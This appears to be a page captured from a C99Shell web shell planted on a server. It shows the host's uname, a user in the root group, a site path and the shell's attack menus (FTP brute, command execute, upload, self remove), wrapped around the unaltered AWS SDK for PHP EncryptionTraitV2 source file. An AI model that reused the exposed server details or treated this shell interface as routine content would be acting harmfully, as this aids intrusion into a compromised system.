!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/aws/aws-sdk-php/src/Crypto/   drwxr-xr-x
Free 28.81 GB of 117.98 GB (24.42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     EncryptionTraitV2.php (7.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Aws\Crypto;

use 
GuzzleHttp\Psr7;
use 
GuzzleHttp\Psr7\AppendStream;
use 
GuzzleHttp\Psr7\Stream;
use 
Psr\Http\Message\StreamInterface;

trait 
EncryptionTraitV2
{
    private static 
$allowedOptions = [
        
'Cipher' => true,
        
'KeySize' => true,
        
'Aad' => true,
    ];

    private static 
$encryptClasses = [
        
'gcm' => AesGcmEncryptingStream::class
    ];

    
/**
     * Dependency to generate a CipherMethod from a set of inputs for loading
     * in to an AesEncryptingStream.
     *
     * @param string $cipherName Name of the cipher to generate for encrypting.
     * @param string $iv Base Initialization Vector for the cipher.
     * @param int $keySize Size of the encryption key, in bits, that will be
     *                     used.
     *
     * @return Cipher\CipherMethod
     *
     * @internal
     */
    
abstract protected function buildCipherMethod($cipherName$iv$keySize);

    
/**
     * Builds an AesStreamInterface and populates encryption metadata into the
     * supplied envelope.
     *
     * @param Stream $plaintext Plain-text data to be encrypted using the
     *                          materials, algorithm, and data provided.
     * @param array $options    Options for use in encryption, including cipher
     *                          options, and encryption context.
     * @param MaterialsProviderV2 $provider A provider to supply and encrypt
     *                                      materials used in encryption.
     * @param MetadataEnvelope $envelope A storage envelope for encryption
     *                                   metadata to be added to.
     *
     * @return StreamInterface
     *
     * @throws \InvalidArgumentException Thrown when a value in $options['@CipherOptions']
     *                                   is not valid.
     *s
     * @internal
     */
    
public function encrypt(
        
Stream $plaintext,
        array 
$options,
        
MaterialsProviderV2 $provider,
        
MetadataEnvelope $envelope
    
) {
        
$options array_change_key_case($options);
        
$cipherOptions array_intersect_key(
            
$options['@cipheroptions'],
            
self::$allowedOptions
        
);

        if (empty(
$cipherOptions['Cipher'])) {
            throw new 
\InvalidArgumentException('An encryption cipher must be'
                
' specified in @CipherOptions["Cipher"].');
        }

        
$cipherOptions['Cipher'] = strtolower($cipherOptions['Cipher']);

        if (!
self::isSupportedCipher($cipherOptions['Cipher'])) {
            throw new 
\InvalidArgumentException('The cipher requested is not'
                
' supported by the SDK.');
        }

        if (empty(
$cipherOptions['KeySize'])) {
            
$cipherOptions['KeySize'] = 256;
        }
        if (!
is_int($cipherOptions['KeySize'])) {
            throw new 
\InvalidArgumentException('The cipher "KeySize" must be'
                
' an integer.');
        }

        if (!
MaterialsProviderV2::isSupportedKeySize(
            
$cipherOptions['KeySize']
        )) {
            throw new 
\InvalidArgumentException('The cipher "KeySize" requested'
                
' is not supported by AES (128 or 256).');
        }

        
$cipherOptions['Iv'] = $provider->generateIv(
            
$this->getCipherOpenSslName(
                
$cipherOptions['Cipher'],
                
$cipherOptions['KeySize']
            )
        );

        
$encryptClass self::$encryptClasses[$cipherOptions['Cipher']];
        
$aesName $encryptClass::getStaticAesName();
        
$materialsDescription = ['aws:x-amz-cek-alg' => $aesName];

        
$keys $provider->generateCek(
            
$cipherOptions['KeySize'],
            
$materialsDescription,
            
$options
        
);

        
// Some providers modify materials description based on options
        
if (isset($keys['UpdatedContext'])) {
            
$materialsDescription $keys['UpdatedContext'];
        }

        
$encryptingStream $this->getEncryptingStream(
            
$plaintext,
            
$keys['Plaintext'],
            
$cipherOptions
        
);

        
// Populate envelope data
        
$envelope[MetadataEnvelope::CONTENT_KEY_V2_HEADER] = $keys['Ciphertext'];
        unset(
$keys);

        
$envelope[MetadataEnvelope::IV_HEADER] =
            
base64_encode($cipherOptions['Iv']);
        
$envelope[MetadataEnvelope::KEY_WRAP_ALGORITHM_HEADER] =
            
$provider->getWrapAlgorithmName();
        
$envelope[MetadataEnvelope::CONTENT_CRYPTO_SCHEME_HEADER] = $aesName;
        
$envelope[MetadataEnvelope::UNENCRYPTED_CONTENT_LENGTH_HEADER] =
            
strlen($plaintext);
        
$envelope[MetadataEnvelope::MATERIALS_DESCRIPTION_HEADER] =
            
json_encode($materialsDescription);
        if (!empty(
$cipherOptions['Tag'])) {
            
$envelope[MetadataEnvelope::CRYPTO_TAG_LENGTH_HEADER] =
                
strlen($cipherOptions['Tag']) * 8;
        }

        return 
$encryptingStream;
    }

    
/**
     * Generates a stream that wraps the plaintext with the proper cipher and
     * uses the content encryption key (CEK) to encrypt the data when read.
     *
     * @param Stream $plaintext Plain-text data to be encrypted using the
     *                          materials, algorithm, and data provided.
     * @param string $cek A content encryption key for use by the stream for
     *                    encrypting the plaintext data.
     * @param array $cipherOptions Options for use in determining the cipher to
     *                             be used for encrypting data.
     *
     * @return [AesStreamInterface, string]
     *
     * @internal
     */
    
protected function getEncryptingStream(
        
Stream $plaintext,
        
$cek,
        &
$cipherOptions
    
) {
        switch (
$cipherOptions['Cipher']) {
            
// Only 'gcm' is supported for encryption currently
            
case 'gcm':
                
$cipherOptions['TagLength'] = 16;
                
$encryptClass self::$encryptClasses['gcm'];
                
$cipherTextStream = new $encryptClass(
                    
$plaintext,
                    
$cek,
                    
$cipherOptions['Iv'],
                    
$cipherOptions['Aad'] = isset($cipherOptions['Aad'])
                        ? 
$cipherOptions['Aad']
                        : 
'',
                    
$cipherOptions['TagLength'],
                    
$cipherOptions['KeySize']
                );

                if (!empty(
$cipherOptions['Aad'])) {
                    
trigger_error("'Aad' has been supplied for content encryption"
                        
" with " $cipherTextStream->getAesName() . ". The"
                        
" PHP SDK encryption client can decrypt an object"
                        
" encrypted in this way, but other AWS SDKs may not be"
                        
" able to."E_USER_WARNING);
                }

                
$appendStream = new AppendStream([
                    
$cipherTextStream->createStream()
                ]);
                
$cipherOptions['Tag'] = $cipherTextStream->getTag();
                
$appendStream->addStream(Psr7\Utils::streamFor($cipherOptions['Tag']));
                return 
$appendStream;
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--